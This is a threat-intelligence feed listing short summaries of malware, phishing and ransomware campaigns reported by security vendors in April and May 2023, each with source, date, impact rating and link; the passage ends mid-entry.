- ASEC analyzed and confirmed the distribution of RecordBreaker through a YouTube account and possibly hacked recently. RecordBreaker is a new Infostealer version of Raccoon Stealer. It tries to pretend itself as a software installer and similar to CryptBot, RedLine, and Vidar. AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of RecordBreaker through a YouTube account that is assumed to have been recently hacked.
—
- Intel Source:
- Mcafee
- Intel Name:
- New_MultiStage_Attack_and_Malware_Distribution_of_Amadey
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- McAfee Labs researchers have identified an increase in Wextract.exe samples, that drop a malware payload at multiple stages.
—
- Intel Source:
- Cleafy
- Intel Name:
- New_Web_Injection_Toolkit_DrIBAN_Targeting_Italian_Corporate_Banking_Clients
- Date of Scan:
- 2023-05-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Cleafy have observed that Italian corporate banking clients are the target of an ongoing financial fraud campaign that has been leveraging a new web-inject toolkit called drIBAN since at least 2019.
Source:
https://www.cleafy.com/cleafy-labs/uncovering-driban-fraud-operations-chapter1
—
- Intel Source:
- CERT-UA
- Intel Name:
- SmokeLoader_and_RoarBAT_Malware_Attacks_Against_Ukraine
- Date of Scan:
- 2023-05-08
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified an ongoing phishing campaign with invoice-themed lures being used to distribute the SmokeLoader malware in the form of a polyglot file.
—
- Intel Source:
- Fortinet
- Intel Name:
- SideCopy_Group_Delivering_Malware_via_Phishing_Emails
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- FortiGate researchers have identified one file that referenced an Indian state military research organization and an in-development nuclear missile. The file is meant to deploy malware with characteristics matching the APT group SideCopy with activities dating back to at least 2019, this group has aligned its targeting with the goals and objectives of the Pakistani government.
Source:
https://www.fortinet.com/blog/threat-research/clean-rooms-nuclear-missiles-and-sidecopy
—
- Intel Source:
- Cyble
- Intel Name:
- Phishing_Sites_Spreading_RAT_Called_DarkWatchMan
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- Cyble researchers have identified a phishing website that imitated a renowned Russian website, CryptoPro CSP. TAs is using this website to distribute DarkWatchman malware.
Source:
https://blog.cyble.com/2023/05/05/sophisticated-darkwatchman-rat-spreads-through-phishing-sites/
—
- Intel Source:
- KrebsonSecurity
- Intel Name:
- US_Job_Services_Leaks_Customer_Data
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- Researchers from KrebsonSecurity have identified a huge tranche of full credit card records exposed online, and that at first glance the domain names involved appeared to be affiliated with the United States Postal Service.
—
- Intel Source:
- Mcafee
- Intel Name:
- An_Increase_in_SHTML_Phishing_Attacks
- Date of Scan:
- 2023-05-08
- Impact:
- MEDIUM
- Summary:
- McAfee researchers have observed a new wave of phishing attacks. In this wave, the attacker has been abusing server-parsed HTML (SHTML) files. The SHTML files are commonly associated with web servers redirecting users to malicious, credential-stealing websites or displaying phishing forms locally within the browser to harvest user-sensitive information.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shtml-phishing-attack-with-blurred-image/
—
- Intel Source:
- Netscope
- Intel Name:
- The_Analysis_of_CrossLock_Ransomware
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Netskope researchers have identified a new ransomware named CrossLock. It emerged in April 2023, targeting a large digital certifier company in Brazil. This ransomware was written in Go, which has also been adopted by other ransomware groups, including Hive, due to the cross-platform capabilities offered by the language.
Source:
https://www.netskope.com/blog/netskope-threat-coverage-crosslock-ransomware
—
- Intel Source:
- Cyble
- Intel Name:
- New_KEKW_Malware_Variant_Detected_in_PyPI_Packages
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Cyble researchers have uncovered multiple malicious Python .whl (Wheel) files that are found to be distributing a new malware named ‘KEKW’. KEKW malware can steal sensitive information from infected systems, as well as perform clipper activities which can lead to the hijacking of cryptocurrency transactions.
Source:
https://blog.cyble.com/2023/05/03/new-kekw-malware-variant-identified-in-pypi-package-distribution/
—
- Intel Source:
- Sophos
- Intel Name:
- DLL_sideloading_Attacks_Gain_New_Air_With_a_Doubled_Dragon_Breath
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Sophos researchers have spotted malicious DLL sideloading activity that builds on the classic sideloading scenario but adds complexity and layers to its execution.
Source:
https://news.sophos.com/en-us/2023/05/03/doubled-dll-sideloading-dragon-breath/
—
- Intel Source:
- Meta
- Intel Name:
- Multiple_Malware_Targeting_Business_Users
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Researchers from Meta have analyzed the persistent malware campaigns targeting businesses across the internet, including threat indicators to help raise the industry’s collective defenses across the internet.
Source:
https://engineering.fb.com/2023/05/03/security/malware-nodestealer-ducktail/
—
- Intel Source:
- Lab52
- Intel Name:
- Mustang_Panda_New_Campaign_Against_Australia
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Lab52 researchers have found a zip file named Biography of Senator the Hon Don Farrell.zip. Hon Don Farrell is the current Australian Secretary of State for Trade and Tourism, indicating a targeted campaign against Australia.
Source:
https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/
—
- Intel Source:
- Sentilone
- Intel Name:
- The_Second_Variant_of_Atomic_Stealer_macOS_Malware
- Date of Scan:
- 2023-05-06
- Impact:
- LOW
- Summary:
- The threat actor, however, has been busy looking for other ways to target macOS users with a different version of Atomic Stealer. In this post, we take a closer look at how Atomic Stealer works and describe a previously unreported second variant. We also provide a comprehensive list of indicators to aid threat hunters and security teams defending macOS endpoints.
—
- Intel Source:
- Sentilone
- Intel Name:
- Kimsuky_New_Global_Campaign
- Date of Scan:
- 2023-05-06
- Impact:
- MEDIUM
- Summary:
- SentinelLabs has observed ongoing attacks from Kimsuky, a North Korean state-sponsored APT that has a long history of targeting organizations across Asia, North America, and Europe. Ongoing campaigns use a new malware component called ReconShark, which is actively delivered to specifically attacked individuals through spear-phishing emails, OneDrive links leading to document downloads, and the execution of malicious macros. ReconShark operates as a reconnaissance tool with unique execution instructions and server communication methods. Recent activity has been linked to a broader set of skills are attributed to North Korea.
Source:
https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Infostealer_Embedded_in_a_Word_Document
- Date of Scan:
- 2023-05-06
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a malicious document which is an embedded object.
Source:
https://isc.sans.edu/diary/Infostealer+Embedded+in+a+Word+Document/29810/
—
- Intel Source:
- Bushidotoken
- Intel Name:
- Raspberry_Robin_USB_malware_campaign
- Date of Scan:
- 2023-05-06
- Impact:
- LOW
- Summary:
- Bushidotoken blog shares the technical details about this malware and analyses how it runs, works, the commands it runs, the processes it uses, and in this case how C2 communications look like.
Source:
https://blog.bushidotoken.net/2023/05/raspberry-robin-global-usb-malware.html
—
- Intel Source:
- Cyble
- Intel Name:
- BlackBit_Ransomware
- Date of Scan:
- 2023-05-06
- Impact:
- MEDIUM
- Summary:
- AhnLab shared their analyses about BlackBit ransomware is being distributed in Korea. BlackBit Ransomware is a LokiLocker ransomware variant that based on the RaaS model. The source code of the BlackBit shows the ransomware is a copy of the LokiLocker with some new changes such as icons, name, color scheme. BlackBit ransomware is a sophisticated one with multipleseveral capabilities to establish persistence, defense evasion, and impair recovery.
Source:
https://blog.cyble.com/2023/05/03/blackbit-ransomware-a-threat-from-the-shadows-of-lokilocker/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Malware_IcedID_information_stealer_configuration_analyses
- Date of Scan:
- 2023-05-05
- Impact:
- LOW
- Summary:
- Palo Alto researchers shared an example of an IcedID malware (information stealer) configuration, how it was obfuscated and how they extracted it. It was one IcedID binary and how its configurations are encrypted.
Source:
https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing/
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Vidar_Infostealer_targeted_a_Polish_Healthcare_Industry
- Date of Scan:
- 2023-05-05
- Impact:
- LOW
- Summary:
- EclecticIQ researchers has observed a spearphishing email targeting the healthcare industry in Poland. The spoofed email looked like as real sent from a Polish government entity and contained a infectips Microsoft Excel XLL attachment that can download and execute Vidar Infostealer malware.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Destructive_cyberattack_UAC_0165_on_the_public_sector_of_Ukraine_using_RoarBat
- Date of Scan:
- 2023-05-05
- Impact:
- MEDIUM
- Summary:
- Upon receiving information about interference in the information and communication system (ICS) of one of the state organizations of Ukraine, measures to investigate a cyber attack were initiated. It was found that the performance of electronic computing machines (server equipment, automated user workstations, data storage systems) was impaired as a result of the destructive influence carried out using the appropriate software.
—
- Intel Source:
- Mandiant
- Intel Name:
- The_Investigation_of_BRAINSTORM_and_RILIDE
- Date of Scan:
- 2023-05-04
- Impact:
- LOW
- Summary:
- Mandiant researchers have identified BRAINSTORM, a rust-based dropper, which ultimately led to RILIDE, a chromium-based extension first publicly reported by SpiderLabs. After careful investigation identified that the email and cryptocurrency theft ecosystem of RILIDE is larger than reported.
Source:
https://www.mandiant.com/resources/blog/lnk-between-browsers
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Longzhi_is_Back_With_New_Technique
- Date of Scan:
- 2023-05-04
- Impact:
- LOW
- Summary:
- TrendMicro researchers have discovered a new campaign by Earth Longzhi that is targeting organizations based in Taiwan, Thailand, the Philippines, and Fiji. The recent campaign follows months of dormancy, abuses a Windows Defender executable to perform DLL sideloading while also exploiting a vulnerable driver, zamguard64.sys, to disable security products installed on the hosts via a bring-your-own-vulnerable-driver (BYOVD) attack.
—
- Intel Source:
- Checkpoint
- Intel Name:
- North_Korean_Group_ScarCruft_Deploying_RokRAT_Malware
- Date of Scan:
- 2023-05-04
- Impact:
- LOW
- Summary:
- Checkpoint researchers have identified that the North Korean threat actor known as ScarCruft started experimenting with oversized LNK files as a delivery route for RokRAT malware as early as July 2022, the same month Microsoft began blocking macros across Office documents by default.
Source:
https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/
—
- Intel Source:
- SocRadar
- Intel Name:
- Diving_Deep_into_BlackByte_Ransomware
- Date of Scan:
- 2023-05-03
- Impact:
- LOW
- Summary:
- Researchers from SOCRadar have analyzed the BlackByte ransomware. It is a Ransomware operation that began targeting corporate victims worldwide in July 2021. The first findings regarding the group emerged after victims sought help decrypting their files.
Source:
https://socradar.io/dark-web-profile-blackbyte-ransomware/
—
- Intel Source:
- ASEC
- Intel Name:
- CoinMiner_Distributing_to_Linux_SSH_Servers
- Date of Scan:
- 2023-05-03
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered XMRig CoinMiner being installed on poorly managed Linux SSH servers. The attacks have been happening with a distinct pattern since 2022, they involve the usage of malware developed with Shell Script Compiler when installing the XMRig, as well as the creation of a backdoor SSH account.
—
- Intel Source:
- Prodaft
- Intel Name:
- Russian_APT_Hacked_Tajikistani_Carrier_to_Spy_on_Government_and_Public_Services
- Date of Scan:
- 2023-05-03
- Impact:
- MEDIUM
- Summary:
- Researchers from Prodaft have observed a Russian espionage group tracked as Nomadic Octopus spying on Tajikistan’s high-ranking government officials, public service infrastructures, and telecoms services, likely by infiltrating a mobile phone carrier.
Source:
https://www.prodaft.com/m/reports/PAPERBUG_TLPWHITE-1.pdf
—
- Intel Source:
- PaloAlto
- Intel Name:
- Internet_Threats_Are_Impersonating_Common_Industries_via_Phishing_Attacks_Web_Skimmer_Analysis_and_Many_More
- Date of Scan:
- 2023-05-03
- Impact:
- LOW
- Summary:
- PaloAlto researchers have observed the internet threat landscape and analyzed malicious URL distribution, geolocation, category analysis, and statistics describing attempted malware attacks. Also, this includes industry sectors being targeted for spoofing in phishing pages, as well as downloaded malware statistics, injected JavaScript malware analysis, and malicious DNS analysis.
Source:
https://unit42.paloaltonetworks.com/internet-threats-late-2022/
—
- Intel Source:
- Cyble
- Intel Name:
- Malware_Families_Leveraging_AresLoader_for_Distribution
- Date of Scan:
- 2023-05-03
- Impact:
- LOW
- Summary:
- Cyble researchers have observed a new loader called AresLoader that is used to spread several types of malware families. It is a loader malware written in the C programming language that first emerged in cybercrime forums and Telegram channels in 2022.
—
- Intel Source:
- Guardio
- Intel Name:
- The_Unstoppable_Malverposting_Continues
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- In this post Gardio vresearchers shared the huge numbers of IOC detections of Malverposting, and also very detailed analyses of this one campaign using adult-rated click bates delivering sophisticated malware — making it even harder for detection, and too easy to mass propagate.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Overview_of_UNIZA_Ransomware
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- Fortinet researchers have discovered a new ransomware variant called UNIZA. Like other ransomware variants. It uses the Command Prompt (cmd.exe) window to display its ransom message, and interestingly, it does not append the filename of the files it encrypts, making it more difficult to determine which files have been impacted.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-uniza-coverage
—
- Intel Source:
- TrendMicro
- Intel Name:
- Ransomware_Family_Rapture_is_Similar_to_Paradise
- Date of Scan:
- 2023-05-01
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have observed a type of ransomware targeting its victims via a minimalistic approach with tools that leave only a minimal footprint behind. The findings revealed many of the preparations made by the perpetrators and how quickly they managed to carry out the ransomware attack.
—
- Intel Source:
- Elastic
- Intel Name:
- New_LOBSHOT_Malware_Deploying_Via_Google_Ads
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- Researchers from Elastic Security Labs have observed one malware family called LOBSHOT. It continues to collect victims while remaining undetected. Also, the infrastructure belongs to TA505, the well-known cybercriminal group associated with Dridex, Locky, and Necurs campaigns.
Source:
https://www.elastic.co/security-labs/elastic-security-labs-discovers-lobshot-malware
—
- Intel Source:
- Trellix
- Intel Name:
- Threat_Actors_Leveraging_SEO_Poisoning
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- Trellix researchers have identified that hackers continue to innovate their techniques to infect victims, with SEO poisoning being one of the recent trends.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_Statistics
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from November 21st, 2022 (Monday) to November 27th (Sunday).
—
- Intel Source:
- Mitiga
- Intel Name:
- A_malicious_Mitiga_document
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- Last January, an attacker uploaded a malicious .docx file to Virus Total. He used several of Mitiga’s publicly available branding elements which included logo, fonts and colors, to lend credibility to the document.
Source:
https://www.mitiga.io/blog/mitiga-advisory-virus-total
—
- Intel Name:
- ASEC_Weekly_Phishing_Email_analyses_April_9_15th_2023
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- ASEC lab researchers continiusly monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from April 9th, 2023 to April 15st, 2023 and provide statistical information on each type.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- An_Ongoing_Magecart_Campaign
- Date of Scan:
- 2023-04-30
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have identified an ongoing Magecart campaign that is leveraging realistic-looking fake payment screens to capture sensitive data entered by unsuspecting users.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/04/kritec-art
—
- Intel Source:
- CERT-UA
- Intel Name:
- Hackers_From_APT28_Group_Distributing_Emails_With_Instructions_on_Updating_OS
- Date of Scan:
- 2023-04-30
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have observed the distribution of emails with subject “Windows Update”, allegedly sent on behalf of system administrators of departments. At the same time, senders’ email addresses created on the @outlook.com public service can be formed using the real name and initials of the employee.
—
- Intel Source:
- Bitdefender
- Intel Name:
- The_BellaCiao_Malware_of_Iran
- Date of Scan:
- 2023-04-27
- Impact:
- MEDIUM
- Summary:
- BitDefender researchers have observed the modernization of Charming Kitten’s tactics, techniques, and procedures, including a new, previously unseen malware. This malware is tailored to suit individual targets and exhibits a higher level of complexity, evidenced by a unique communication approach with its command-and-control (C2) infrastructure.
Source:
https://businessinsights.bitdefender.com/unpacking-bellaciao-a-closer-look-at-irans-latest-malware
—
- Intel Source:
- Sekoia
- Intel Name:
- Raccoon_and_Vidar_Stealers_Spreading_Fake_Cracked_new
- Date of Scan:
- 2023-04-27
- Impact:
- MEDIUM
- Summary:
- Sekoia researchers have identified the infection chain that is using about a hundred fake cracked software catalog websites that redirect to several links before downloading the payload hosted on file share platforms, such as GitHub.
—
- Intel Source:
- Aqua
- Intel Name:
- The_Exploiting_of_Kubernetes_RBAC_by_attackers
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Aqua researchers have observed new evidence that attackers are exploiting Kubernetes (K8s) Role-Based Access Control (RBAC) in the wild to create backdoors. The attackers also tried to lunch a DaemonSets to take control and seize resources of the K8s clusters they attack. Aqua analyses suspects that this campaign is actively targeting at least 60 clusters in the wild.
Source:
https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
—
- Intel Source:
- Uptycs
- Intel Name:
- RTM_Locker_Ransomware_as_a_Service_Now_Suits_Linux_Architecture
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Uptycs researchers have discovered a new ransomware binary attributed to the RTM group, a known ransomware-as-a-service (RaaS) provider. This is the first time the group has created a Linux binary. Its locker ransomware infects Linux, NAS, and ESXi hosts and appears to be inspired by Babuk ransomware’s leaked source code.
Source:
https://www.uptycs.com/blog/rtm-locker-ransomware-as-a-service-raas-linux
—
- Intel Source:
- PaloAlto
- Intel Name:
- PingPull_Malware_is_Updated_by_Chinese_Alloy_Taurus
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Unit 42 researchers have identified a new variant of PingPull malware used by Alloy Taurus actors designed to target Linux systems. While following the infrastructure leveraged by the actor for this PingPull variant, we also identified their use of another backdoor we track as Sword2033.
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Selling_New_Atomic_macOS_Stealer_on_Telegram
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Cyble Researchers have discovered a Telegram channel advertising a new information-stealing malware called Atomic macOS Stealer (AMOS). The malware is specifically designed to target macOS and can steal sensitive information from the victim’s machine.
Source:
https://blog.cyble.com/2023/04/26/threat-actor-selling-new-atomic-macos-amos-stealer-on-telegram/
—
- Intel Source:
- TrendMicro
- Intel Name:
- TrafficStealer_Abusing_Open_Container_APIs
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have discovered a different type of attack, a piece of software that leverages Docker containers to generate money through monetized traffic. Although the piece of software itself appears to be legitimate, it likely has compromised components that result in monitoring as a potentially unwanted application.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- APT_Group_Panda_Delivering_Malware_via_Software_Updates
- Date of Scan:
- 2023-04-27
- Impact:
- HIGH
- Summary:
- ESET researchers discovered a new campaign by the APT group known as Evasive Panda targeting an international NGO in China with malware delivered through updates of popular Chinese software.
—
- Intel Source:
- Cyble
- Intel Name:
- PaperCut_actively_exploited_in_the_Wild
- Date of Scan:
- 2023-04-27
- Impact:
- MEDIUM
- Summary:
- Earlier this month, PaperCut shared a Security alert stating, they have an evidence that unpatched servers are being exploited in the wild. Russian Hacker Suspected Exploiting the PaperCut Vulnerability. The advisories provided by vendors shared insights into the two CVEs – CVE-2023-27350 (Severity: Critical) & CVE-2023-27351(Severity: High). Cyble researchers shared their details for the same in their post.
Source:
https://blog.cyble.com/2023/04/25/print-management-software-papercut-actively-exploited-in-the-wild/
—
- Intel Source:
- ASEC
- Intel Name:
- RokRAT_Malware_Distributing_Through_LNK_Files
- Date of Scan:
- 2023-04-26
- Impact:
- LOW
- Summary:
- ASEC researchers have observed that the RedEyes threat group (also known as APT37, ScarCruft), which distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month, has also recently distributed the RokRAT malware through LNK files.
—
- Intel Source:
- Zero Day Initiative (ZDI)
- Intel Name:
- New_the_Mirai_botnet_exploit
- Date of Scan:
- 2023-04-26
- Impact:
- MEDIUM
- Summary:
- The Zero Day Initiative threat-hunting team discovered recently new exploit attempts in Eastern Europe showing that the Mirai botnet has updated its version to CVE-2023-1389, known as ZDI-CAN-19557/ZDI-23-451. This malicious activity in the TP-Link Archer AX21 Wi-Fi router was originally disclosed to ZDI during the Pwn2Own Toronto event, where it was used by Team Viettel in their LAN-side entry against the TP-Link device and by Qrious Security in their WAN-side entry.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Phishing_Attack_Increasing_in_Singapore_for_Tax_Portal
- Date of Scan:
- 2023-04-26
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified an IRAS phishing website that looks legitimate, this website asks users to input their Singapore Personal Access (Singpass) credentials to access government and private services (such as banking) in Singapore.
Source:
https://isc.sans.edu/diary/Strolling+through+Cyberspace+and+Hunting+for+Phishing+Sites/29780/
—
- Intel Source:
- Infoblox
- Intel Name:
- Finding_Decoy_Dog_Toolkit_via_Anomalous_DNS_Traffic
- Date of Scan:
- 2023-04-26
- Impact:
- LOW
- Summary:
- Researchers from Infoblox have identified a new malware toolkit named Decoy Dog, that has been discovered that allows attackers to avoid standard detection techniques and target enterprises. It uses DNS query dribbling and strategic domain aging techniques to bypass security checks.
—
- Intel Source:
- ASEC
- Intel Name:
- Tonto_Team_Using_Anti_Malware_Related_Files_for_DLL_Side_Loading
- Date of Scan:
- 2023-04-26
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified the Tonto Team threat group is targeting mainly Asian countries and has been distributing Bisonal malware
—
- Intel Source:
- Securelist
- Intel Name:
- The_Analysis_of_Tomiris_Group
- Date of Scan:
- 2023-04-25
- Impact:
- LOW
- Summary:
- Securelist researchers have continued to track Tomiris as a separate threat actor over three new attack campaigns between 2021 and 2023 and it is targeting government and diplomatic entities in the CIS.
Source:
https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/
—
- Intel Source:
- Cofense
- Intel Name:
- After_15_Years_release_Open_Source_Gh0st_RAT_still_Haunting_Inboxes
- Date of Scan:
- 2023-04-25
- Impact:
- LOW
- Summary:
- Cofense Intelligence Unit discovered Gh0st RAT, old open-source RAT, that is targeting a healthcare organization. Gh0st RAT was created by a Chinese hacking group named C. The public release of Gh0st RAT source code made it easy for threat actors to manipulate victims. Their information-stealing capabilities: taking full control of the infected machine, recording keystrokes in real time with offline logging available, accessing live web cam feeds including microphone recording, downloading files remotely, remote shutdown and reboot, disabling user input
Source:
https://cofense.com/blog/open-source-gh0st-rat-still-haunting-inboxes-15-years-after-release/
—
- Intel Source:
- Checkpoint
- Intel Name:
- New_Findings_of_Educated_Manticore
- Date of Scan:
- 2023-04-25
- Impact:
- MEDIUM
- Summary:
- Researchers from Checkpoint have revealed new findings of an activity cluster closely related to Phosphorus. It presents a new and improved infection chain leading to the deployment of a new version of PowerLess. This implant is attributed to Phosphorus in the past, an Iran-affiliated threat group operating in the Middle East and North America.
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Repurposing_Package_Name_on_PyPI_to_Push_Malware
- Date of Scan:
- 2023-04-25
- Impact:
- LOW
- Summary:
- Researchers from Reversing Labs have observed that a malicious package on the Python Package Index (PyPI) named termcolour, a three-stage downloader published in multiple versions.
Source:
https://www.reversinglabs.com/blog/package-names-repurposed-to-push-malware-on-pypi
—
- Intel Source:
- Huntress
- Intel Name:
- Zero_Day_Vulnerabilities_in_PaperCut_Print_Management_Software
- Date of Scan:
- 2023-04-24
- Impact:
- LOW
- Summary:
- Researchers from Huntress have tracked the exploitation of zero-day vulnerabilities against PaperCut MF/NG which allow for unauthenticated remote code execution due to an authentication bypass.
Source:
https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software
—
- Intel Source:
- TrendMicro
- Intel Name:
- ViperSoftX_Encryption_Updates
- Date of Scan:
- 2023-04-24
- Impact:
- LOW
- Summary:
- TrendMicro researchers have observed cryptocurrency and information stealer ViperSoftX evading initial loader detection and making its lure more believable by making the initial package loader via cracks, keygens, activators, and packers non-malicious.
Source:
https://www.trendmicro.com/en_us/research/23/d/vipersoftx-updates-encryption-steals-data.html
—
- Intel Source:
- Cyble
- Intel Name:
- The_QakBot_Malware_Continues_to_Evolve
- Date of Scan:
- 2023-04-24
- Impact:
- LOW
- Summary:
- Cyble Research Intelligence Labs have observed that several malware families, such as AsyncRAT, QuasarRAT, DCRAT, etc., have been found using OneNote attachments as part of their tactics. In February 2023, the well-known malware, Qakbot, started using OneNote attachments in their spam campaigns.
Source:
https://blog.cyble.com/2023/04/21/qakbot-malware-continues-to-morph/
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- New_OCX_HARVESTER_Attack_Campaign_Using_Modernized_More_Eggs_Suite
- Date of Scan:
- 2023-04-24
- Impact:
- MEDIUM
- Summary:
- Securonix Threat Labs researchers have observed a new attack campaign tracked as OCX#HARVESTER. Some of the malicious payloads leveraged as part of the attack campaign observed appear to be related to the More_eggs malicious payloads reported earlier.
—
- Intel Source:
- Symantec
- Intel Name:
- X_Trader_Supply_Chain_Attack_Affecting_Critical_Infrastructure_Organizations_in_US_and_Europe
- Date of Scan:
- 2023-04-24
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec have identified that North Korean-linked operations affected more organizations beyond 3CX, including two critical infrastructure organizations in the energy sector.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain
—
- Intel Source:
- Jamf
- Intel Name:
- BlueNoroff_APT_Group_Targeting_macOS_With_RustBucket_Malware
- Date of Scan:
- 2023-04-24
- Impact:
- LOW
- Summary:
- Jamf Threat Labs have discovered a macOS malware family that communicates with command and control (C2) servers to download and execute various payloads. They track and protect against this malware family under the name ‘RustBucket’ and suspect it to be attributed to a North Korean, state-sponsored threat actor.
Source:
https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Lazarus_Hackers_Pushing_Linux_Malware_via_Fake_Job_Offers
- Date of Scan:
- 2023-04-22
- Impact:
- MEDIUM
- Summary:
- Researchers from Welivesecurity identified a new Lazarus campaign considered part of “Operation DreamJob” has been discovered targeting Linux users with malware for the first time.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Scams_Involving_ChatGPT_Are_on_the_Rise
- Date of Scan:
- 2023-04-22
- Impact:
- LOW
- Summary:
- Unit42 researchers have monitored the newly registered domains and squatting domains related to ChatGPT, as it is one of the fastest-growing consumer applications in history. The dark side of this popularity is that ChatGPT is also attracting the attention of scammers seeking to benefit from using wording and domain names that appear related to the site.
Source:
https://unit42.paloaltonetworks.com/chatgpt-scam-attacks-increasing/
—
- Intel Source:
- Sophos
- Intel Name:
- Two_New_QakBot_C2_Servers_Detected
- Date of Scan:
- 2023-04-22
- Impact:
- LOW
- Summary:
- Sophos researchers have detected two new QakBot servers that have not yet been publicly identified. These servers are used by threat actors to manage and control QakBot infections, a banking trojan that has been active since 2008 and primarily targets financial institutions and their customers.
Source:
https://news.sophos.com/en-us/2023/04/20/new-qakbot-c2-servers-detected-with-sophos-ndr/
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Examination_of_EvilExtractor_Tool
- Date of Scan:
- 2023-04-22
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs researchers have analyzed the EvilExtractor tool which is an attack tool designed to target Windows operating systems and extract data and files from endpoint devices. Also, observed this malware in a phishing email campaign on 30 March.
Source:
https://www.fortinet.com/blog/threat-research/evil-extractor-all-in-one-stealer
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_the_BlackBit_ransomware
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has recently discovered the distribution of the BlackBit ransomware disguised as svchost.exe during the team’s monitoring. According to the ASEC’s internal infrastructure, the BlackBit ransomware has been continuously distributed
—
- Intel Source:
- Threatmon
- Intel Name:
- New_Attack_Chain_Uncovered_From_Blind_Eagle_Cyber_Espionage_Group
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Researchers from Threatmon have observed that the cyber espionage actor tracked as Blind Eagle has been linked to a new multi-stage attack chain that leads to the deployment of the NjRAT remote access trojan on compromised systems.
Source:
https://threatmon.io/apt-blind-eagles-malware-arsenal-technical-analysis/
—
- Intel Source:
- Secureworks
- Intel Name:
- Bumblebee_Malware_Distributing_Via_Trojanized_Installer_Downloads
- Date of Scan:
- 2023-04-21
- Impact:
- MEDIUM
- Summary:
- https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads
Source:
https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads
—
- Intel Source:
- Symantec
- Intel Name:
- Daggerfly_APT_Group_Targeting_Telecoms_Company_in_Africa
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Researchers from Symantec have identified that Telecommunication services providers in Africa are the target of a new campaign orchestrated by a China-linked threat actor at least since November 2022.
—
- Intel Source:
- Symantec
- Intel Name:
- Play_Ransomware_Group_Using_New_Custom_Data_Gathering_Tools
- Date of Scan:
- 2023-04-21
- Impact:
- MEDIUM
- Summary:
- Symantec researchers have identified that the Play ransomware group is using two new, custom-developed tools that allow it to enumerate all users and computers on a compromised network, and copy files from the Volume Shadow Copy Service (VSS) that are normally locked by the operating system.
—
- Intel Source:
- Google Blog
- Intel Name:
- Russian_Hackers_Conducting_Phishing_Attacks_in_Ukraine
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
